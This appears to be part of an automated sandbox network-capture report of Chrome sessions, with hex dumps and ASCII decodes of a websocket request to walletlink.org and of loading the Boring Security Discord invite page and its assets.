                                                                          Data Ascii: YTO0/,$%!%%!"" "# "# 22.VXW!# #%"!#!!" "%#"&$$'&885HIDPSNltnfWSO22/)(%&'#$$!#$!"# "# !# !" " !$"%'%%(&886LLH\\Zlz
                                                                          2023-12-10 16:45:05 UTC4744INData Raw: 2a 28 ff 2c 2a 28 ff 27 27 24 ff 48 47 44 ff b0 ab a7 ff ac a8 a3 ff a2 9d 99 ff 2e 2e 2c ff 79 75 71 ff 9a 96 91 ff 9f 9c 98 ff 95 92 8d ff 77 75 72 ff 2b 2e 2c ff 20 22 1f ff 21 23 20 ff 22 25 22 ff 23 26 23 ff 26 28 27 ff 27 29 28 ff 50 4f 4a ff 4e 4d 49 f7 60 60 60 08 00 00 00 00 00 00 00 00 00 00 00 00 7d 77 71 cb 6b 66 61 ff 20 21 20 ff 2c 2b 28 ff 29 28 26 ff 2a 29 27 ff 2a 29 27 ff 27 28 25 ff 26 26 22 ff 28 28 25 ff 47 46 44 ff 6e 6c 69 ff 34 34 31 ff 47 44 40 ff 6b 68 64 ff 82 80 7d ff 84 82 81 ff 78 75 70 ff 79 76 70 ff 4f 4f 4d ff 1f 21 1f ff 21 22 21 ff 25 26 24 ff 23 25 23 ff 28 2a 28 ff 2c 2d 2b ff 4f 4e 4a ff 5e 5e 5a b6 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 8c 85 81 6d 69 62 5d ff 3c 3b 38 ff 2a 2a 28 ff 2f 2e 2b ff 2d 2c 2a ff
                                                                          Data Ascii: *(,*(''$HGD..,yuqwur+., "!# "%"#&#&('')(POJNMI```}wqkfa ! ,+()(&*)'*)''(%&&"((%GFDnli441GD@khd}xupyvpOOM!!"!%&$#%#(*(,-+ONJ^^Zmib]<;8**(/.+-,*
                                                                          2023-12-10 16:45:05 UTC5930INData Raw: 22 20 ff 1f 21 1e ff 20 22 20 ff 22 23 21 ff 23 25 23 ff 24 26 25 ff 23 27 25 ff 24 26 25 ff 43 43 3f ff 4c 4d 49 ff 47 49 44 fa 59 59 57 78 80 80 80 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 64 5d 55 21 58 53 4d da 4f 4b 45 ff 57 55 50 ff 26 26 21 ff 1e 1f 1c ff 1f 20 1d ff 1f 20 1d ff 1f 20 1d ff 20 21 1e ff 20 20 1f ff 21 22 1f ff 68 64 61 ff 45 44 41 ff 26 26 23 ff 25 25 22 ff 38 39 36 ff 3e 3f 3c ff 20 20 1e ff 1f 20 1d ff 1f 20 1e ff 1f 20 1e ff 22 22 20 ff 52 4f 4b ff 41 41 3e ff 41 42 3f ff 39 38 35 ff 20 22 20 ff 1f 21 1f ff 1f 21 1e ff 1f 22 1f ff 20 22 1f ff 22 24 22 ff 27 29 27 ff 27 29 28 ff 25 28 26 ff 25 28 27 ff 2c 2e 2a ff 5a 5a 55 ff 46 47 44 ff 53 53 50 c5 60 60 60 18 00 00 00 00 00 00 00 00 00 00 00 00
                                                                          Data Ascii: " ! " "#!#%#$&%#'%$&%CC?LMIGIDYYWxd]U!XSMOKEWUP&&! ! !"hdaEDA&&#%%"896>?< "" ROKAA>AB?985 " !!" ""$"')'')(%(&%(',.*ZZUFGDSSP```
                                                                          2023-12-10 16:45:05 UTC1045INData Raw: 9d 99 94 8b 75 9e 9e 9a 3f 80 80 80 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00
                                                                          Data Ascii: u?


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          221192.168.2.549954104.18.37.84435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:05 UTC503OUTGET /rpc HTTP/1.1
                                                                          Host: www.walletlink.org
                                                                          Connection: Upgrade
                                                                          Pragma: no-cache
                                                                          Cache-Control: no-cache
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Upgrade: websocket
                                                                          Origin: https://boringsecurity.com
                                                                          Sec-WebSocket-Version: 13
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Sec-WebSocket-Key: qMVfARzqgBrNQZwtsYgaig==
                                                                          Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
                                                                          2023-12-10 16:45:06 UTC358INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 30 36 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 32 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 48 65 61 64 65 72 73 3a 20 41 75 74 68 6f 72 69 7a 61 74 69 6f 6e 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 2a 0d 0a 53 65 63 2d 57 65 62 73 6f 63 6b 65 74 2d 56 65 72 73 69 6f 6e 3a 20 31 33 0d 0a 58 2d 43 6f 6e 74 65 6e
                                                                          Data Ascii: HTTP/1.1 400 Bad RequestDate: Sun, 10 Dec 2023 16:45:06 GMTContent-Type: text/plain; charset=utf-8Content-Length: 12Connection: closeAccess-Control-Allow-Headers: AuthorizationAccess-Control-Allow-Origin: *Sec-Websocket-Version: 13X-Conten
                                                                          2023-12-10 16:45:06 UTC12INData Raw: 42 61 64 20 52 65 71 75 65 73 74 0a
                                                                          Data Ascii: Bad Request


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          222192.168.2.549955162.159.134.2344435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:06 UTC647OUTGET /boringsecurity HTTP/1.1
                                                                          Host: discord.gg
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Upgrade-Insecure-Requests: 1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Sec-Fetch-Site: none
                                                                          Sec-Fetch-Mode: navigate
                                                                          Sec-Fetch-Dest: document
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-12-10 16:45:06 UTC853INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 30 36 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 4c 6f 63 61 74 69 6f 6e 3a 20 68 74 74 70 73 3a 2f 2f 64 69 73 63 6f 72 64 2e 63 6f 6d 2f 69 6e 76 69 74 65 2f 62 6f 72 69 6e 67 73 65 63 75 72 69 74 79 0d 0a 53 74 72 69 63 74 2d 54 72 61 6e 73 70 6f 72 74 2d 53 65 63 75 72 69 74 79 3a 20 6d 61 78 2d 61 67 65 3d 33 31 35 33 36 30 30 30 3b 20 69 6e 63 6c 75 64 65 53 75 62
                                                                          Data Ascii: HTTP/1.1 301 Moved PermanentlyDate: Sun, 10 Dec 2023 16:45:06 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 0Connection: closeLocation: https://discord.com/invite/boringsecurityStrict-Transport-Security: max-age=31536000; includeSub


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          223192.168.2.549957162.159.137.2324435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:06 UTC655OUTGET /invite/boringsecurity HTTP/1.1
                                                                          Host: discord.com
                                                                          Connection: keep-alive
                                                                          Upgrade-Insecure-Requests: 1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Sec-Fetch-Site: none
                                                                          Sec-Fetch-Mode: navigate
                                                                          Sec-Fetch-Dest: document
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-12-10 16:45:07 UTC497INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 30 37 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 46 2d 52 61 79 3a 20 38 33 33 36 66 34 64 37 36 61 62 31 36 64 62 33 2d 4d 49 41 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 48 49 54 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 72 69 76 61 74 65 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 53 61 74 2c 20 30 39 20 44 65 63 20 32 30 32 33
                                                                          Data Ascii: HTTP/1.1 200 OKDate: Sun, 10 Dec 2023 16:45:07 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCF-Ray: 8336f4d76ab16db3-MIACF-Cache-Status: HITAccept-Ranges: bytesCache-Control: privateLast-Modified: Sat, 09 Dec 2023
                                                                          2023-12-10 16:45:07 UTC3586INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 73 65 6c 66 27 3b 20 73 63 72 69 70 74 2d 73 72 63 20 27 73 65 6c 66 27 20 27 75 6e 73 61 66 65 2d 65 76 61 6c 27 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 20 27 6e 6f 6e 63 65 2d 4d 6a 59 73 4d 6a 55 73 4d 6a 4d 77 4c 44 51 78 4c 44 45 78 4f 53 77 7a 4f 53 77 78 4c 44 6b 7a 27 20 62 6c 6f 62 3a 20 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 64 69 73 63 6f 72 64 61 70 70 2e 63 6f 6d 2f 61 6e 69 6d 61 74 69 6f 6e 73 2f 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 72 65 63 61 70 74 63 68 61 2f 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 72 65 63 61 70 74 63 68 61 2f 20 68 74 74 70 73 3a 2f
                                                                          Data Ascii: Content-Security-Policy: default-src 'self'; script-src 'self' 'unsafe-eval' 'unsafe-inline' 'nonce-MjYsMjUsMjMwLDQxLDExOSwzOSwxLDkz' blob: https://cdn.discordapp.com/animations/ https://www.gstatic.com/recaptcha/ https://www.google.com/recaptcha/ https:/
                                                                          2023-12-10 16:45:07 UTC968INData Raw: 58 2d 43 6f 6e 74 65 6e 74 2d 54 79 70 65 2d 4f 70 74 69 6f 6e 73 3a 20 6e 6f 73 6e 69 66 66 0d 0a 58 2d 46 72 61 6d 65 2d 4f 70 74 69 6f 6e 73 3a 20 44 45 4e 59 0d 0a 58 2d 58 53 53 2d 50 72 6f 74 65 63 74 69 6f 6e 3a 20 31 3b 20 6d 6f 64 65 3d 62 6c 6f 63 6b 0d 0a 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 33 3f 73 3d 31 51 41 46 48 71 49 51 77 39 6d 6b 69 38 76 58 70 55 4c 61 52 55 6c 4f 48 39 76 48 4b 72 59 48 77 4b 70 79 25 32 42 51 37 38 70 69 41 61 34 71 6a 55 56 64 65 4b 63 59 66 36 6b 30 4d 67 46 73 41 43 7a 72 75 7a 61 4e 61 52 6b 4c 38 77 31 72 54 34 62 79 68 59 72 74
                                                                          Data Ascii: X-Content-Type-Options: nosniffX-Frame-Options: DENYX-XSS-Protection: 1; mode=blockReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=1QAFHqIQw9mki8vXpULaRUlOH9vHKrYHwKpy%2BQ78piAa4qjUVdeKcYf6k0MgFsACzruzaNaRkL8w1rT4byhYrt
                                                                          2023-12-10 16:45:07 UTC1369INData Raw: 34 34 63 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 33 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 43 68 65 63 6b 20 6f 75 74 20 74 68 65 20 42 6f 72 69 6e 67 20 53 65 63 75 72 69 74 79 20 63 6f 6d 6d 75 6e 69 74 79 20 6f 6e 20 44 69 73 63 6f 72 64 20 2d 20 68 61 6e 67 20 6f 75 74 20 77 69 74 68 20 36 35 39 38
                                                                          Data Ascii: 44c8<!DOCTYPE html><html><head> <meta charset="utf-8"> <meta content="width=device-width,initial-scale=1,maximum-scale=3" name="viewport"><meta name="description" content="Check out the Boring Security community on Discord - hang out with 6598
                                                                          2023-12-10 16:45:07 UTC1369INData Raw: 63 6f 6e 74 65 6e 74 3d 22 69 64 22 20 2f 3e 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 3a 61 6c 74 65 72 6e 61 74 65 22 20 63 6f 6e 74 65 6e 74 3d 22 65 6c 22 20 2f 3e 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 3a 61 6c 74 65 72 6e 61 74 65 22 20 63 6f 6e 74 65 6e 74 3d 22 68 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 3a 61 6c 74 65 72 6e 61 74 65 22 20 63 6f 6e 74 65 6e 74 3d 22 64 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 3a 61 6c 74 65 72 6e 61 74 65 22 20 63 6f 6e 74 65 6e 74 3d 22 68 75 22 20 2f 3e 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 3a 61
                                                                          Data Ascii: content="id" /><meta property="og:locale:alternate" content="el" /><meta property="og:locale:alternate" content="he" /><meta property="og:locale:alternate" content="de" /><meta property="og:locale:alternate" content="hu" /><meta property="og:locale:a
                                                                          2023-12-10 16:45:07 UTC1369INData Raw: 61 6c 74 65 72 6e 61 74 65 22 20 63 6f 6e 74 65 6e 74 3d 22 65 6e 2d 47 42 22 20 2f 3e 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 3a 61 6c 74 65 72 6e 61 74 65 22 20 63 6f 6e 74 65 6e 74 3d 22 68 69 22 20 2f 3e 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 3a 61 6c 74 65 72 6e 61 74 65 22 20 63 6f 6e 74 65 6e 74 3d 22 65 73 2d 45 53 22 20 2f 3e 0a 3c 6d 65 74 61 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 68 72 65 66 6c 61 6e 67 3d 22 63 73 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 69 73 63 6f 72 64 2e 63 6f 6d 2f 69 6e 76 69 74 65 2f 62 6f 72 69 6e 67 73 65 63 75 72 69 74 79 3f 6c 6f 63 61 6c 65 3d 63 73 22 20 2f 3e 0a 3c 6d 65 74 61 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61
                                                                          Data Ascii: alternate" content="en-GB" /><meta property="og:locale:alternate" content="hi" /><meta property="og:locale:alternate" content="es-ES" /><meta rel="alternate" hreflang="cs" href="https://discord.com/invite/boringsecurity?locale=cs" /><meta rel="alterna
                                                                          2023-12-10 16:45:07 UTC1369INData Raw: 68 74 74 70 73 3a 2f 2f 64 69 73 63 6f 72 64 2e 63 6f 6d 2f 69 6e 76 69 74 65 2f 62 6f 72 69 6e 67 73 65 63 75 72 69 74 79 3f 6c 6f 63 61 6c 65 3d 74 72 22 20 2f 3e 0a 3c 6d 65 74 61 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 68 72 65 66 6c 61 6e 67 3d 22 6e 6f 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 69 73 63 6f 72 64 2e 63 6f 6d 2f 69 6e 76 69 74 65 2f 62 6f 72 69 6e 67 73 65 63 75 72 69 74 79 3f 6c 6f 63 61 6c 65 3d 6e 6f 22 20 2f 3e 0a 3c 6d 65 74 61 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 68 72 65 66 6c 61 6e 67 3d 22 72 6f 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 69 73 63 6f 72 64 2e 63 6f 6d 2f 69 6e 76 69 74 65 2f 62 6f 72 69 6e 67 73 65 63 75 72 69 74 79 3f 6c 6f 63 61 6c 65 3d 72 6f 22 20 2f 3e 0a 3c 6d 65
                                                                          Data Ascii: https://discord.com/invite/boringsecurity?locale=tr" /><meta rel="alternate" hreflang="no" href="https://discord.com/invite/boringsecurity?locale=no" /><meta rel="alternate" hreflang="ro" href="https://discord.com/invite/boringsecurity?locale=ro" /><me
                                                                          2023-12-10 16:45:07 UTC1369INData Raw: 6e 2d 55 53 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 69 73 63 6f 72 64 2e 63 6f 6d 2f 69 6e 76 69 74 65 2f 62 6f 72 69 6e 67 73 65 63 75 72 69 74 79 3f 6c 6f 63 61 6c 65 3d 65 6e 2d 55 53 22 20 2f 3e 0a 3c 6d 65 74 61 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 68 72 65 66 6c 61 6e 67 3d 22 61 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 69 73 63 6f 72 64 2e 63 6f 6d 2f 69 6e 76 69 74 65 2f 62 6f 72 69 6e 67 73 65 63 75 72 69 74 79 3f 6c 6f 63 61 6c 65 3d 61 72 22 20 2f 3e 0a 3c 6d 65 74 61 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 68 72 65 66 6c 61 6e 67 3d 22 70 74 2d 42 52 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 69 73 63 6f 72 64 2e 63 6f 6d 2f 69 6e 76 69 74 65 2f 62 6f 72 69 6e 67 73 65 63 75 72 69 74 79
                                                                          Data Ascii: n-US" href="https://discord.com/invite/boringsecurity?locale=en-US" /><meta rel="alternate" hreflang="ar" href="https://discord.com/invite/boringsecurity?locale=ar" /><meta rel="alternate" hreflang="pt-BR" href="https://discord.com/invite/boringsecurity
                                                                          2023-12-10 16:45:07 UTC1369INData Raw: 2f 2e 74 65 73 74 28 6c 6f 63 61 74 69 6f 6e 2e 70 61 74 68 6e 61 6d 65 29 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 4d 6a 59 73 4d 6a 55 73 4d 6a 4d 77 4c 44 51 78 4c 44 45 78 4f 53 77 7a 4f 53 77 78 4c 44 6b 7a 22 3e 77 69 6e 64 6f 77 2e 5f 5f 42 49 4c 4c 49 4e 47 5f 53 54 41 4e 44 41 4c 4f 4e 45 5f 5f 3d 2f 5e 5c 2f 62 69 6c 6c 69 6e 67 2f 2e 74 65 73 74 28 6c 6f 63 61 74 69 6f 6e 2e 70 61 74 68 6e 61 6d 65 29 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 4d 6a 59 73 4d 6a 55 73 4d 6a 4d 77 4c 44 51 78 4c 44 45 78 4f 53 77 7a 4f 53 77 78 4c 44 6b 7a 22 3e 77 69 6e 64 6f 77 2e 47 4c 4f 42 41 4c 5f 45 4e 56 20 3d 20 7b 0a 20 20 20 20 20 20 41 50 49 5f 45 4e 44 50 4f 49 4e 54 3a 20 27 2f 2f 64 69 73
                                                                          Data Ascii: /.test(location.pathname)</script><script nonce="MjYsMjUsMjMwLDQxLDExOSwzOSwxLDkz">window.__BILLING_STANDALONE__=/^\/billing/.test(location.pathname)</script><script nonce="MjYsMjUsMjMwLDQxLDExOSwzOSwxLDkz">window.GLOBAL_ENV = { API_ENDPOINT: '//dis
                                                                          2023-12-10 16:45:07 UTC1369INData Raw: 63 6f 72 64 61 70 70 2e 63 6f 6d 27 2c 0a 20 20 20 20 20 20 4d 49 47 52 41 54 49 4f 4e 5f 44 45 53 54 49 4e 41 54 49 4f 4e 5f 4f 52 49 47 49 4e 3a 20 27 68 74 74 70 73 3a 2f 2f 64 69 73 63 6f 72 64 2e 63 6f 6d 27 2c 0a 20 20 20 20 20 20 48 54 4d 4c 5f 54 49 4d 45 53 54 41 4d 50 3a 20 44 61 74 65 2e 6e 6f 77 28 29 2c 0a 20 20 20 20 20 20 41 4c 47 4f 4c 49 41 5f 4b 45 59 3a 20 27 61 63 61 30 64 37 30 38 32 65 34 65 36 33 61 66 35 62 61 35 39 31 37 64 35 65 39 36 62 65 64 30 27 2c 0a 20 20 20 20 20 20 50 55 42 4c 49 43 5f 50 41 54 48 3a 20 27 2f 61 73 73 65 74 73 2f 27 0a 20 20 20 20 7d 3b 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 4d 6a 59 73 4d 6a 55 73 4d 6a 4d 77 4c 44 51 78 4c 44 45 78 4f 53 77 7a 4f 53 77 78 4c 44 6b 7a 22
                                                                          Data Ascii: cordapp.com', MIGRATION_DESTINATION_ORIGIN: 'https://discord.com', HTML_TIMESTAMP: Date.now(), ALGOLIA_KEY: 'aca0d7082e4e63af5ba5917d5e96bed0', PUBLIC_PATH: '/assets/' };</script><script nonce="MjYsMjUsMjMwLDQxLDExOSwzOSwxLDkz"


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          224192.168.2.549958162.159.137.2324435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:07 UTC882OUTGET /assets/shared.f01e9143e31c19a68a8e.css HTTP/1.1
                                                                          Host: discord.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: text/css,*/*;q=0.1
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: style
                                                                          Referer: https://discord.com/invite/boringsecurity
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=Wf8dpJLvTBPfU2iDh1vsf1vbH.IbLyFk4yg_iaAqREA-1702226707253-0-604800000
                                                                          2023-12-10 16:45:08 UTC1109INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 30 38 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 63 73 73 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 34 35 39 33 33 39 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 46 2d 52 61 79 3a 20 38 33 33 36 66 34 64 64 31 64 31 33 64 61 39 37 2d 4d 49 41 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 48 49 54 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 68 74 74 70 73 3a 2f 2f 64 69 73 63 6f 72 64 2e 63 6f 6d 0d 0a 43 61 63 68 65 2d 43 6f 6e 74
                                                                          Data Ascii: HTTP/1.1 200 OKDate: Sun, 10 Dec 2023 16:45:08 GMTContent-Type: text/cssContent-Length: 459339Connection: closeCF-Ray: 8336f4dd1d13da97-MIACF-Cache-Status: HITAccept-Ranges: bytesAccess-Control-Allow-Origin: https://discord.comCache-Cont
